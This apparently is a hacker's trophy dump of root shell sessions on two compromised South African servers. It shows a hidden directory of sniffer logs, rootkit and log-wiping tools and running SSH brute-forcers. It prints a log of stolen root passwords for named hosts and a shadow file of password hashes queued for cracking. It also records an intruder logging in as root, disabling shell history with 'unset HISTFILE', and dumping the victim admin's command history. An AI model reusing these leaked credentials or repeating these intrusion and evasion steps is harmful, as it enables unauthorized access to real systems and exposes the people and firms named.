-rw-r--r-- 1 root root 5372411 Jun 15 2004 fsav-wks-4-52-2481.tgz -rwxr-xr-x 1 1360 users 5336184 Nov 26 2003 fsav-wks-4.52.2481* -rw-r--r-- 1 root root 46 Apr 9 2003 get -rw-r--r-- 1 root root 12886 Aug 22 2004 histo.tgz drwxr-xr-x 2 root root 48 Jul 28 2003 in/ -rwxr-xr-x 1 516 516 18792 Dec 20 2002 install.sh* -rw-r--r-- 1 1360 users 6247 Nov 26 2003 installation.txt -rw------- 1 root root 1019 Jun 26 2004 irenecountrylodge.co.za drwxr-xr-x 5 root root 144 Sep 8 2004 john-1.6/ -rw-r--r-- 1 root root 497341 Jun 18 2004 john-1.6.tar.gz -rw-r--r-- 1 root root 216846 Oct 15 2004 keep -rwxr-xr-x 1 root root 1518 Sep 1 2004 mail* drwxr-xr-x 2 root root 184 Aug 6 2003 maillog/ -rw-r--r-- 1 root root 16195 Sep 10 2004 mailq -rw-r--r-- 1 root root 68839 Dec 2 2004 mails.lafarge drwxr-xr-x 2 1360 users 216 Nov 26 2003 manual-pages-html/ drwxr-xr-x 2 1360 users 200 Nov 26 2003 manual-pages-txt/ -rw------- 1 root root 290824 Jun 13 09:58 mbox -rwxr-xr-x 1 root root 252 Sep 19 2003 mqueue* -rw-r----- 1 root root 280342788 Dec 9 2004 nestlife.brenda.bak 
-rw-r--r-- 1 root root 58943 Mar 26 2003 nfmc.log -rw-r--r-- 1 root root 169 Dec 20 21:50 password -rw-rw-r-- 1 516 516 15040 Dec 20 2002 readme.txt -rw-r--r-- 1 root root 1216 Mar 13 2003 relay -rw-r--r-- 1 1360 users 25063 Nov 28 2003 release-notes.txt -rw-r--r-- 1 root root 19699 Sep 1 2004 report -rw-r--r-- 1 root root 3339 Sep 6 2004 report.dean -rwxr-xr-x 1 516 516 2393 Dec 20 2002 resend.sh* -rwxr-xr-x 1 516 516 1659 Dec 20 2002 restore.sh* -rw-r--r-- 1 root root 13594 Dec 5 2003 rrm -rw-r--r-- 1 root root 94280 Jun 10 2004 save -rw-r--r-- 1 root root 10396 Mar 13 2003 sendmail.8.12.security.cr.patch -rw-r----- 1 root root 628 Sep 15 2003 sendmail.st -rwxr-xr-x 1 root root 197 Dec 2 2004 test* drwx------ 2 root root 80 Jun 14 01:20 tmp/ -rw-r--r-- 1 root root 339 Sep 10 2003 todel drwxr-xr-x 3 root root 72 Sep 4 2004 usr/ drwxr-xr-x 3 root root 72 Aug 22 2004 var/ -rw-r--r-- 1 root root 7572 Sep 14 2003 var.trz -rw-r--r-- 1 root root 11829 Jun 10 2004 wondershaper-1.0.tar.gz drwxr-xr-x 2 1000 users 2072 Sep 10 2004 xamime-LINUX/ [root@plet root]# ls BitDefender-sendmail-1.5.5-2.linux-gcc3x.i586.tar.run* Creport Desktop/ Documents/ Mail/ Sreport XAM-BE-33-29672-LINUX-glibc23-sm11.tar.gz XAM-BE-33-31609-LINUX-glibc23-sm11.tar.gz XAM-BE-33-31642-LINUX-glibc22-sm11.tar.gz XAM-LEVEL3-33-33946-LINUX-glibc23-sm11.tar.gz XAM-LEVEL3-33-34116-LINUX-glibc23-sm11.tar.gz aliases.frogav.co.za* altermime-0.3.6/ altermime-0.3.6.tar.gz apg-2.2.3/ apg-2.2.3-1mdk.i586.rpm apg-2.2.3.tar.gz cleanxmime* core.13099 core.13184 core.13191 core.18972 csav-4.80.7-shared.i386.rpm dead.letter doc_linux.zip domainlist drakx/ fernando fetchmail.txt fsav-wks-4-52-2481.tgz fsav-wks-4.52.2481* get histo.tgz in/ install.sh* installation.txt irenecountrylodge.co.za john-1.6/ john-1.6.tar.gz keep mail* maillog/ mailq mails.lafarge manual-pages-html/ manual-pages-txt/ mbox mqueue* nestlife.brenda.bak nfmc.log password readme.txt relay release-notes.txt report report.dean resend.sh* restore.sh* 
rrm save sendmail.8.12.security.cr.patch sendmail.st test* tmp/ todel usr/ var/ var.trz wondershaper-1.0.tar.gz xamime-LINUX/ You have new mail in /var/spool/mail/root [root@plet root]# cd .ssh [root@plet .ssh]# cat known_hosts
[root@plet .ssh]# uname -a ;id;w Linux plet.compumail.co.za 2.4.19-16mdksmp #1 SMP Fri Sep 20 16:08:37 CEST 2002 i686 unknown
unknown GNU/Linux uid=0(root) gid=0(root) groups=0(root) 1:29am up 14 days, 17:07, 0 users, load average: 0.21, 0.30, 0.38 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [root@plet .ssh]# cd /tmp/ [root@plet tmp]# ls -la total 14 drwxrwxrwt 5 root root 360 Jun 14 01:28 ./ drwxr-xr-x 21 root adm 880 May 30 08:20 ../ d--S--S--T 18 root root 1416 Jun 14 01:00 .../ -rw-rw-rw- 1 ratana_g ratana_g 4 Jun 13 15:00 .900.f5a648 drwxrwxrwt 2 xfs xfs 72 Sep 12 2003 .font-unix/ srw------- 1 root root 0 May 22 10:14 .fsav-0= srw------- 1 root root 0 Jun 14 01:28 .fsav-0-sa= -rw-r--r-- 1 root root 0 Jun 13 04:10 authfail.log.unsort -rw-r--r-- 1 root root 0 Jun 13 04:10 denied.log.unsort -rw-r--r-- 1 root root 554 Jun 14 00:58 ls -rw-r--r-- 1 root root 0 Jun 13 04:10 sarg.log.unsort drwx------ 2 root root 80 Feb 27 2003 ssh-XXE002K6/ [root@plet tmp]# cd ... [root@plet ...]# ls -la total 159052 d--S--S--T 18 root root 1416 Jun 14 01:00 ./ drwxrwxrwt 5 root root 360 Jun 14 01:30 ../ -rw-r--r-- 1 root root 21788442 Jun 14 01:30 .sniff -rw-r--r-- 1 root root 121983894 Jan 1 18:25 .sniff.old -rw-r--r-- 1 root root 6178477 May 20 08:28 .sniff.old2 drwxr-xr-x 12 dlv_bern 1038 1200 Apr 23 20:36 BitchX/ drwxr-sr-x 2 root root 120 Jun 8 04:33 afp/ drwxrwxrwx 8 3232 ntools 928 Jan 14 06:35 cfengine-2.0.7/ -rw-r--r-- 1 root root 1190033 May 15 2003 cfengine-2.0.7.tar.gz drwxr-sr-x 2 root root 96 Jun 8 18:12 cimap/ drwxr-xr-x 10 1001 wheel 864 Jun 11 15:54 h4ckwebdav/ -rw-r--r-- 1 root root 405818 Jun 11 15:51 h4ckwebdav.tar.gz -rwx------ 1 root root 12014 Sep 14 2004 hide* drwxr-sr-x 2 root root 152 Jun 6 17:31 imap/ -rw-r--r-- 1 root root 6550 Apr 23 20:32 index.html -rw-r--r-- 1 root root 2532476 Mar 27 2004 ircii-pana-1.1-final.tar.gz -rw-r--r-- 1 root root 1153560 Dec 11 2003 irssi-0.8.9.tar.gz drwxr-sr-x 5 root root 144 May 12 23:33 john-1.6/ -rw-r--r-- 1 root root 497341 Sep 18 1999 john-1.6.tar.gz -rw-r--r-- 1 root root 0 Jun 13 05:41 mail.hm drwxrwxrwx 32 1000 1000 1416 May 28 08:05 
mailutils-0.6/ -rw-r--r-- 1 root root 2837017 Dec 23 20:19 mailutils-0.6.tar.gz drwxrwxrwx 4 500 frog_rud 1824 Jun 8 15:42 nano-1.2.5/ -rw-r--r-- 1 root root 911938 May 16 06:06 nano-1.2.5.tar.gz -rw-r--r-- 1 root root 1846196 Apr 24 08:58 nmap-3.81.tgz -rw-r--r-- 1 root root 2105 Dec 11 2004 nmap.log drwxrwxr-x 7 500 frog_rud 10768 Jun 8 15:56 openssh-3.4p1/ -rw-r--r-- 1 root root 837668 Sep 17 2002 openssh-3.4p1.tar.gz -rw-r--r-- 1 root root 312224 Jun 24 2004 psyBNC2.3.1.tar.gz drwxrwxr-x 11 root root 728 Mar 9 08:58 psybnc/ drwxr-sr-x 2 root root 176 May 27 21:41 rlogin/ -rw------- 1 1010 dlv_bern 263 Feb 18 2000 rootkitutil.h drwxr-xr-x 3 root wheel 216 Jan 2 07:58 shoutcast-1-9-4-linux-glibc6/ -rw-r--r-- 1 root root 152616 Mar 18 2004 shoutcast-1-9-4-linux-glibc6.tar.gz drwxr-xr-x 2 root root 632 May 11 23:10 shroud-1.30/ -rw-r--r-- 1 root root 9248 Nov 3 2002 shroud-1.30.tgz -rwxr-xr-x 1 root root 20416 May 13 00:43 sol* -rw-r--r-- 1 root root 12529 May 13 00:42 sol.c drwxr-sr-x 2 root root 256 Jun 12 03:37 sshbrute/ -rw-r--r-- 1 root root 2402 Jun 10 06:21 ssheist-1.log drwxr-sr-x 3 root root 656 May 12 04:03 synscan/ -rw-r--r-- 1 root root 53939 Mar 22 2002 synscan1.6.tar.gz -rwxr-xr-x 1 root root 19860 May 11 23:13 vanish2* -rw------- 1 1010 dlv_bern 8525 Feb 18 2000 vanish2.c -rw-r--r-- 1 root root 3256 Feb 18 2000 vanish2.tgz [root@plet ...]# cat nmap.log
[root@plet ...]# cat ssheist-1.log =========================================================================== Username: root Password: n3tw0rk1ng Host: lin02.lanlink.co.za =========================================================================== =========================================================================== Username: root Password: `1q2wsxde Host: lin02.lanlink.co.za =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: localhost =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: sodwana.compumail.co.za =========================================================================== =========================================================================== Username: root Password: coahtr Host: histologic.no-ip.info =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za =========================================================================== =========================================================================== Username: test Password: test Host: 129.7.238.59 =========================================================================== 
=========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za =========================================================================== [root@plet ...]# cd john-1.6/ [root@plet john-1.6]# cd run [root@plet run]# ls 128.8.140.206.shadow john.ini restore all.chr john.pot unafs@ alpha.chr lanman.chr unique@ digits.chr mailer* unshadow@ john* password.lst [root@plet run]# cat john.pot [root@plet run]# cat 128.8.140.206.shadow root:1/CYJWaWszA5M:6445:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445:::::: ravi:3uX7r/uT9F/7I:11404:::::: patrick:eM61oULnSalhY:12175:::::: [root@plet run]# [root@plet run]# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 1364 500 ? S May30 0:53 init [3] root 2 0.0 0.0 0 0 ? SW May30 0:00 [keventd] root 3 0.0 0.0 0 0 ? SWN May30 0:02 [ksoftirqd_CPU0] root 4 0.0 0.0 0 0 ? SWN May30 0:02 [ksoftirqd_CPU1] root 5 0.0 0.0 0 0 ? SW May30 0:19 [kswapd] root 6 0.0 0.0 0 0 ? SW May30 0:00 [bdflush] root 7 0.0 0.0 0 0 ? SW May30 7:37 [kupdated] root 8 0.0 0.0 0 0 ? SW< May30 0:00 [mdrecoveryd] root 12 0.0 0.0 0 0 ? SW May30 0:00 [scsi_eh_0] root 13 0.0 0.0 0 0 ? SW May30 0:00 [scsi_eh_1] root 17 0.0 0.0 0 0 ? SW May30 0:01 [kreiserfsd] root 133 0.0 0.1 2040 1252 ? S May30 0:02 devfsd /dev root 235 0.0 0.0 0 0 ? SW May30 0:00 [khubd] root 965 0.0 0.0 1444 584 ? S May30 20:26 syslogd -m 0 root 973 0.0 0.1 2120 1204 ? S May30 0:04 klogd -2 daemon 2447 0.0 0.0 1392 500 ? S May30 0:00 /usr/sbin/atd named 2464 0.0 1.1 21584 10664 ? 
S May30 0:00 named -u named named 2469 0.0 1.1 21584 10664 ? S May30 0:12 named -u named named 2470 0.0 1.1 21584 10664 ? S May30 14:31 named -u named named 2471 0.0 1.1 21584 10664 ? S May30 14:29 named -u named named 2472 0.0 1.1 21584 10664 ? S May30 0:37 named -u named named 2473 0.0 1.1 21584 10664 ? S May30 6:00 named -u named root 2490 0.0 0.1 1784 1776 ? SL May30 0:50 ntpd -A root 2532 0.0 0.0 2028 880 ? S May30 3:22 xinetd -stayalive root 2608 0.0 0.2 4860 2024 ? S May30 3:29 sendmail: accepti mail 2623 0.0 0.1 4852 1480 ? S May30 0:00 sendmail: Queue r root 2776 0.0 0.2 7760 2472 ? S May30 0:23 httpd-perl -f /et apache 2780 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et apache 2782 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et apache 2783 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et apache 2785 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et root 2793 0.0 0.4 12524 4140 ? S May30 0:27 httpd -DPERLPROXI root 2880 0.0 0.0 1568 672 ? S May30 0:03 crond root 2948 0.0 0.0 1332 408 vc/2 S May30 0:00 /sbin/mingetty tt root 2949 0.0 0.0 1332 408 vc/3 S May30 0:00 /sbin/mingetty tt root 2950 0.0 0.0 1332 408 vc/4 S May30 0:00 /sbin/mingetty tt root 2951 0.0 0.0 1332 408 vc/5 S May30 0:00 /sbin/mingetty tt root 2952 0.0 0.0 1332 408 vc/6 S May30 0:00 /sbin/mingetty tt msp_info 5845 0.0 0.2 3624 2072 ? S May30 6:00 ./Contagious Kv1c root 9155 0.0 0.2 5296 2584 ? S May30 0:00 sendmail: j4U6ftV root 7600 0.0 0.1 3732 1496 ? S Jun01 0:00 /usr/bin/perl /us apache 7601 0.0 0.2 12828 2620 ? S Jun01 0:00 httpd -DPERLPROXI apache 7602 0.0 0.2 12836 2608 ? S Jun01 0:00 httpd -DPERLPROXI apache 7603 0.0 0.2 12828 2616 ? S Jun01 0:00 httpd -DPERLPROXI apache 7604 0.0 0.2 12820 2608 ? S Jun01 0:00 httpd -DPERLPROXI apache 12589 0.0 0.2 12720 2508 ? S Jun01 0:00 httpd -DPERLPROXI root 1260 0.0 0.1 2328 1072 ? S Jun02 0:00 login -- root apache 4834 0.0 0.2 12824 2612 ? S Jun02 0:00 httpd -DPERLPROXI root 14207 0.0 0.0 2632 764 ? 
S Jun03 0:12 ./sshbrute -brute root 17152 0.0 0.1 2712 1632 vc/1 S Jun08 0:00 -bash apache 14863 0.0 0.4 12680 4468 ? S Jun09 0:00 httpd -DPERLPROXI root 24042 0.0 0.2 5216 2508 ? S Jun10 0:00 sendmail: j5AFH2V root 25803 0.2 0.0 1648 728 ? S Jun10 10:41 xfsd root 27645 0.0 0.0 2632 760 ? S Jun10 0:04 ./sshbrute2 -brut root 27695 0.0 0.0 2632 760 ? S Jun10 0:01 ./sshbrute2 -brut root 27805 0.0 0.0 2632 764 ? S Jun10 0:00 ./sshbrute -brute root 26355 0.0 0.0 2632 764 ? S Jun11 0:00 ./sshbrute -brute root 32265 0.0 0.0 2632 764 ? S Jun12 0:00 ./sshbrute -brute root 32275 0.0 0.0 2632 760 ? S Jun12 0:00 ./sshbrute2 -brut root 21234 0.0 0.1 2920 1288 ? S Jun13 0:03 /usr/sbin/sshd root 14019 0.0 0.1 5604 1556 ? S 00:41 0:00 sshd: root@notty root 14389 0.0 0.0 1576 696 ? S 00:45 0:00 CROND root 14391 0.0 0.3 6052 3224 ? S 00:45 0:00 sendmail: ./j5DMj root 15324 0.0 0.2 5216 2496 ? S 00:57 0:00 sendmail: j5DMvsV root 17286 0.0 0.1 5608 1576 ? S 01:17 0:00 sshd: root@notty root 17978 0.0 0.1 5604 1564 ? S 01:25 0:00 sshd: root@pts/4 root 18000 0.0 0.1 2696 1620 pts/4 S 01:25 0:00 -bash root 18328 0.5 0.1 2800 1268 ? S 01:29 0:01 ./sshbrute -brute root 18369 0.3 0.1 2796 1296 ? S 01:30 0:00 ./sshbrute -brute root 18397 0.5 0.1 2796 1296 ? S 01:31 0:00 ./sshbrute -brute root 18433 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut root 18436 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute -brute root 18459 0.2 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut root 18470 0.2 0.1 2784 1120 ? S 01:33 0:00 ./sshbrute2 -brut root 18471 0.0 0.1 3172 1320 pts/4 R 01:33 0:00 ps aux [root@plet run]# logout ---------------------------------- skew @ histologic: nothing much here but more pr00f skew == tal0n. 
---------------------------------- login as: root root@histologic.no-ip.info's password: Last login: Tue Jun 14 04:51:51 2005 from adsl-10-197-59.mia.bellsouth.net [root@histofw root]# unset HISTFILE [root@histofw root]# w 07:01:49 up 200 days, 17:40, 0 users, load average: 0.01, 0.02, 0.00 USER TTY LOGIN@ IDLE JCPU PCPU WHAT [root@histofw root]# ls -al total 408 drwx------ 20 root root 4096 Jun 14 05:15 ./ drwxr-xr-x 18 root adm 4096 Nov 25 2004 ../ -rw------- 1 root root 16160 Jun 12 14:42 .bash_history -rw-r--r-- 1 root root 24 Dec 2 2002 .bash_logout -rw-r--r-- 1 root root 106 Dec 2 2002 .bash_profile -rw-r--r-- 1 root root 226 Dec 2 2002 .bashrc -rw-r--r-- 1 root root 233 Dec 2 2002 .cshrc -rw-r--r-- 1 root root 14 May 12 2004 .desktop drwx------ 3 root root 4096 May 12 2004 Desktop/ drwxr-xr-x 2 root root 4096 May 12 2004 Documents/ drwx------ 2 root root 4096 May 12 2004 drakx/ -rw-r--r-- 1 root root 355 May 12 2004 .fonts.cache-1 drwx------ 3 root root 4096 May 12 2004 .gconf/ drwx------ 2 root root 4096 May 12 2004 .gconfd/ drwx------ 2 root root 4096 May 12 2004 .gnome/ drwx------ 3 root root 4096 May 12 2004 .gnome2/ drwx------ 2 root root 4096 May 12 2004 .gnome2_private/ -rw-r--r-- 1 root root 119 May 12 2004 .gtkrc -rw-r--r-- 1 root root 123 May 12 2004 .gtkrc-2.0 -rw------- 1 root root 0 May 13 2004 .ICEauthority drwxr-xr-x 2 root root 4096 May 12 2004 .icewm/ drwx------ 2 root root 4096 Jun 12 04:00 .irssi/ drwxr-xr-x 4 root root 4096 May 13 2004 .kde/ drwxr-xr-x 2 root root 4096 Jun 2 2004 .mc/ drwxr-xr-x 2 root root 4096 May 12 2004 .mcop/ drwxrwxr-x 3 500 500 4096 Jun 4 2004 noip-2.1.1/ -rw-r--r-- 1 root root 71210 Jun 4 2004 noip-duc-linux.tar.gz drwxr-xr-x 2 root root 4096 May 12 2004 .qt/ -rw------- 1 root root 1024 May 13 2004 .rnd -rw-r--r-- 1 root root 126 May 13 2004 .rpmdrake drwxr-xr-x 5 root root 4096 May 13 2004 sarg-1.4.1/ -rw-r--r-- 1 root root 2034 May 13 2004 sarg-1.4.1-index.sort.patch -rw-r--r-- 1 root root 125589 May 13 2004 
sarg-1.4.1.tar.gz -rw-r--r-- 1 root root 329 May 13 2004 sarg_cron.txt -rw-r--r-- 1 root root 177 May 13 2004 sarg_daily.txt -rw-r--r-- 1 root root 612 May 13 2004 sarg_monthly.htm -rw-r--r-- 1 root root 292 May 13 2004 sarg_monthly.txt -rw-r--r-- 1 root root 8368 May 13 2004 sarg.reports.txt -rw-r--r-- 1 root root 435 May 13 2004 sarg_weekly.txt drwx------ 2 root root 4096 May 12 2004 .ssh/ -rw-r--r-- 1 root root 189 Dec 2 2002 .tcshrc drwx------ 4 root root 4096 Jun 14 05:14 tmp/ -rw------- 1 root root 5624 Jun 14 05:15 .viminfo -rw-r--r-- 1 root root 3750 Dec 2 2002 .vimrc -rw-r--r-- 1 root root 6 May 12 2004 .wmrc -rw------- 1 root root 53 May 13 2004 .Xauthority -rw-r--r-- 1 root root 1479 Dec 2 2002 .Xdefaults -rw------- 1 root root 1478 May 13 2004 .xsession-errors [root@histofw root]# history 5 cd /etc/squid/ 6 ll 7 vi squid.conf 8 vi msntauth.conf 9 dig server1 10 cd /etc/hosts 11 cd /etc 12 vi hosta 13 vi hosts 14 dig server1 15 vi hosts 16 /usr/lib/squid/msnt_auth 17 dmesg 18 scp root@knysna.compumail.co.za:/usr/sbin/bwm /usr/sbin/ 19 scp root@knysna.compumail.co.za:/usr/bin/bwm /usr/sbin/ 20 scp root@knysna.compumail.co.za:/usr/bin/bwm /usr/bin/ 21 ll 22 dmesg -c 23 vi msntauth.conf 24 /usr/lib/squid/msnt_auth 25 ping 192.168.0.1 26 ping server1 27 cd squid/ 28 vi msntauth.conf 29 /usr/lib/squid/msnt_auth 30 locate msnt_auth 31 cd /usr/lib/squid/ 32 ll 33 cd et 34 cd .. 35 ll 36 cd squid/ 37 ll 38 file msnt_auth 39 view msnt_auth 40 vi /etc/squid/msntauth.conf 41 pwd 42 ./msnt_auth 43 ./msnt_auth -d 44 /etc/init.d/squid restart 45 cd /etc/squid/ 46 vi squid.conf 47 squid check 48 squid -k check 49 squid -k restart 50 /etc/init.d/squid restart 51 tail -f /var/log/squid/access.log 52 ll 53 cd / 54 cd /root/ 55 ll 56 tar zcvf sarg-1.4.1.tar.gz 57 tar zxvf sarg-1.4.1.tar.gz 58 cd sarg 59 cd sarg-1.4.1 60 ll 61 ll .. 62 cd .. 63 tar zxvf sarg-1.4.1-index.sort.patch.gz 64 gunzip sarg-1.4.1-index.sort.patch.gz 65 ll 66 cd sarg-1.4.1 67 patch -? 
68 patch --help 69 cd .. 70 ll 71 view sarg-1.4.1-index.sort.patch 72 cd sarg 73 cd sarg-1.4.1 74 patch -c0 < ../sarg-1.4.1-index.sort.patch 75 man patch 76 patch -p0 < ../sarg-1.4.1-index.sort.patch 77 ll 78 ./configure 79 make 80 make install 81 vi Makefile 82 locate man 83 locate man | more 84 vi Makefile 85 locate man | more 86 vi Makefile 87 make install 88 cd /etc/shorewall/ 89 vi rules 90 shorewall restart 91 vi rules 92 shorewall restart 93 cat /var/named/office.histologic.co.za.hosts 94 dig server1 95 dig server1.office.histologic.co.za 96 dig server2.office.histologic.co.za 97 vi /etc/nsswitch.conf 98 vi /etc/resolv.conf 99 dig server2.office.histologic.co.za 100 dig www.google.com 101 exit 102 ifconfig 103 ping 196.25.1.1 104 /etc/init.d/iplog status 105 /etc/init.d/iplog restart 106 /etc/init.d/squid status 107 /etc/init.d/squid stop 108 squid -z 109 /etc/init.d/squid start 110 /etc/init.d/squid status 111 tcpdump -i eth1 112 tcpdump -vi eth1 113 tcpdump -vni eth1 114 host 196.37.145.26 115 ssh 196.7.8.54 116 dig -x 165.165.160.224 @196.25.1.1 117 dmesg 118 dmesg -c 119 netstat -rn 120 vi /etc/sysconfig/network 121 /etc/init.d/network restart 122 netstat -rn 123 dmesg -c 124 tcpdump -i eth0 icmp 125 tcpdump -i eth1 icmp 126 vi /etc/shorewall/ 127 netstat -rn 128 tcpdump -i eth1 icmp 129 cd /etc/shorewall/ 130 vi rules 131 shorewall restart 132 dmesg -c 133 dmesg 134 vi /etc/shorewall/rules 135 tcpdump -i eth0 src 192.168.0.10 and dst 192.168.0.1 136 vi /etc/iplog.conf 137 chkconfig --add iplog 138 /etc/init.d/iplog start 139 tail -f /var/log/iplog 140 dig -x 165.165.179.224 141 dig -x 165.165.179.224 @196.25.1.1 142 dig -x 165.165.179.224 @196.168.10.1 143 dig -x 165.165.179.224 @196.168.1.10 144 tail -f /var/log/iplog 145 cd /etc/shorewall/ 146 vi rules 147 vi policy 148 shorewall restart 149 exit 150 vi /usr/sbin/sarg.reports 151 exit 152 /etc/init.d/squid status 153 ping 196.25.1.1 154 dig www.google.com 155 dmesg 156 dmesg -c 157 dig www.google.com 
158 dmesg -c 159 ping 196.25.1.1 160 ifconfig 161 ping 192.168.1.10 162 dmesg -c 163 vi /etc/shorewall/rules 164 dmesg 165 dmesg -c 166 vi /etc/shorewall/rules 167 shorewall restart 168 vi /etc/shorewall/rules 169 cd / 170 sarg.reports 171 crontab -e -u root 172 cd /var/www/ 173 ll 174 rm -rf www/ 175 cd html/squid/ 176 ll 177 ll Daily/ 178 df -g 179 df -h 180 exit 181 bwm 182 dmesg -c 183 exit 184 /etc/init.d/fwlogwatch status 185 vi /etc/fwlogwatch.config 186 /etc/init.d/fwlogwatch stop 187 fwlogwatch 188 /etc/init.d/fwlogwatch status 189 /etc/init.d/fwlogwatch 190 /etc/init.d/fwlogwatch restart 191 killall fwlogwatch 192 /etc/init.d/fwlogwatch restart 193 vi /etc/fwlogwatch.config 194 /etc/init.d/fwlogwatch start 195 /etc/init.d/fwlogwatch restart 196 /etc/init.d/fwlogwatch stop 197 tail /var/log/messages 198 vi /etc/fwlogwatch.config 199 /etc/init.d/fwlogwatch restart 200 fwlogwatch 201 /etc/init.d/fwlogwatch restart 202 exit 203 cd /var/www/html/ 204 ll fwlog.html 205 vi /etc/fwlogwatch.config 206 tail -f /var/log/messages 207 vi /etc/fwlogwatch.config 208 exit 209 /etc/init.d/adsl restart 210 dir 211 /etc/init.d/adsl 212 ifconfig 213 netstat -rn 214 ping 198.168.1.10 215 etc/intit.d/network restart 216 /etc/init.d/network restart 217 ping 192.168.1.10 218 exit 219 /etc/init.d/adsl restart 220 exit 221 ping 196.15.249.203 222 shorewall status 223 /etc/init.d/squid status 224 /etc/init.d/squid stop 225 /etc/init.d/squid start 226 cledar 227 clea 228 clear 229 cd /etc/squid/ 230 ls 231 vi msntauth.conf 232 cd /home/ 233 ls 234 cd /etc/squid/ 235 vi squid.conf 236 cd /usr/lib/squid/ 237 ls 238 vi msnt_auth 239 ls 240 /etc/init.d/squid stop 241 ls 242 vi msnt_auth 243 tail -f /var/log/messages 244 route 245 ping 192.168.1.10 246 /etc/init.d/squid start 247 tail -f /var/log/messages 248 poweroff 249 dmesg 250 clear 251 top 252 dmesg 253 clear 254 /etc/init.d/squid status 255 shorewall status 256 dmes 257 dmesg 258 exit 259 bwm 260 cd /etc/squid/ 261 ls 262 locate 
263 locate access.log 264 cd /var/log/squid 265 ls 266 ls -l 267 bwm 268 ls 269 mv access.log access.log.0206 270 vi access.log 271 ls 272 vi access.log 273 ls 274 vi access.log 275 ls 276 mc 277 mv cache.log cache.log.0206 278 vi cache.log 279 ls 280 mc 281 ls 282 bwm 283 bwm 284 ifconfig 285 tcpdump -ni eth1 286 /etc/init.d/squid stop 287 ls 288 /etc/init.d/squid start 289 /etc/init.d/squid status 290 tail -f /var/log/messages 291 netconf 292 drakconnect 293 /etc/init.d/named status 294 ifconfig 295 drakconnect 296 ifconfig 297 /etc/init.d/network stop 298 ls 299 ping www.mweb.co.za 300 ping knysna.compumail.co.za 301 ipconfig 302 ifconfig 303 ping 192.168.1.2 304 ping 192.168.1.10 305 cd /etc/ 306 http:// 307 ls 308 vi resolv.conf 309 /etc/init.d/named stop 310 /etc/init.d/named start 311 exit 312 ping plet.compumail.co.za 313 tcpdump -ni eth0 314 tcpdump -ni eth1 315 tcpdump -niv eth1 316 tcpdump -v eth1 317 tcpdump -vi eth1 318 exit 319 ping www.mweb.co.za 320 dmesg -c 321 clear 322 dmesg -c 323 dmesg 324 clear 325 dmesg 326 cd /etc/shorewall/ 327 vi rules 328 /etc/init.d/squid stop 329 dmesg 330 dmesg -c 331 clear 332 dmesg -c 333 dmesg 334 clear 335 dmesg 336 tcpdump -ni eth1 337 bwm 338 clear 339 dmesg 340 /etc/init.d/squid start 341 tail -f /var/log/messages 342 vi rules 343 shorewall check 344 shorewall restart 345 exit 346 cd /etc/shorewall/ 347 vi rules 348 shorewall check 349 shorewall restart 350 ping www.mweb.co.za 351 ping knysna.compumail.co.za 352 ping www.saix.net 353 exit 354 ssh knysna.compumail.co.za 355 cd /etc/shorewall/ 356 cat rules 357 dmesg 358 clear 359 dmesg 360 ping pop.worldonline.co.za 361 cd /etc/ 362 vi services 363 vi shorewall/rules 364 dmesg 365 bwm 366 dmesg 367 cd /etc/shorewall/ 368 exit 369 bwm 370 dmesg 371 dmesg -c 372 cd /var/log/messages 373 cd /var/log/ 374 tail messages 375 tail syslog 376 tail squid/access.log 377 vi /etc/resolv.conf 378 ifconfig 379 vi /etc/resolv.conf 380 dig www.google.com 381 dig 
www.lanlink.co.za 382 ifconfig 383 ping 196.25.1.1 384 ping 385 dmesg 386 vi /etc/shorewall/rules 387 vi /etc/shorewall/interfaces 388 ifconfig 389 ping 390 dmesg 391 nmap -sP 192.168.1.0/24 392 ping 192.168.1.2 393 netstat -rn 394 ping 192.168.1.10 395 dmesg 396 vi /etc/shorewall/masq 397 ifconfig 398 vi /etc/shorewall/masq 399 shorewall restart 400 vi /etc/shorewall/masq 401 vi /etc/shorewall/rules 402 shorewall restart 403 ifconfig 404 dig thatcher.no-ip.info 405 vi /etc/shorewall/rules 406 ssh 196.15.249.203 407 dmesg 408 ifconfig 409 tcpdump -i eth0 410 tcpdump -i eth0 not tcp port 22 411 tcpdump -vvi eth0 not tcp port 22 412 tcpdump -vi eth0 not tcp port 22 413 tcpdump -vi eth0 not tcp port 22 and not tcp port 110 414 tcpdump -i eth0 not tcp port 22 and not tcp port 110 415 tcpdump -ni eth0 not tcp port 22 and not tcp port 110 416 tcpdump -ni eth1 not tcp port 22 and not tcp port 110 417 tcpdump -ni eth1 dst 196.22.164.106 418 tcpdump -ni eth1 not tcp port 22 and not tcp port 110 419 dmesg -c 420 vi /etc/shorewall/rules 421 shorewall restart 422 dmesg -c 423 vi /etc/shorewall/rules 424 shorewall restart 425 dmesg -c 426 exit 427 bwm 428 dmesg 429 dmesg -c 430 dmesg 431 wget 432 lynx 433 lynx www.no-ip.com/client/linux/noip-duc-linux.tar.gz 434 tar zxvf noip-duc-linux.tar.gz 435 cd noip-2.1.1/ 436 ll 437 make 438 make install 439 cd / 440 noip2 -C 441 ps -ef 442 ps -ef | grep noip 443 noip2 -? 444 noip2 445 ps -ef | grep noip 446 ifconfig 447 dmesg 448 dmesg -c 449 noip2 450 noip2 -? 451 dmesg -c 452 bwm 453 exit 454 /etc/init.d/named status 455 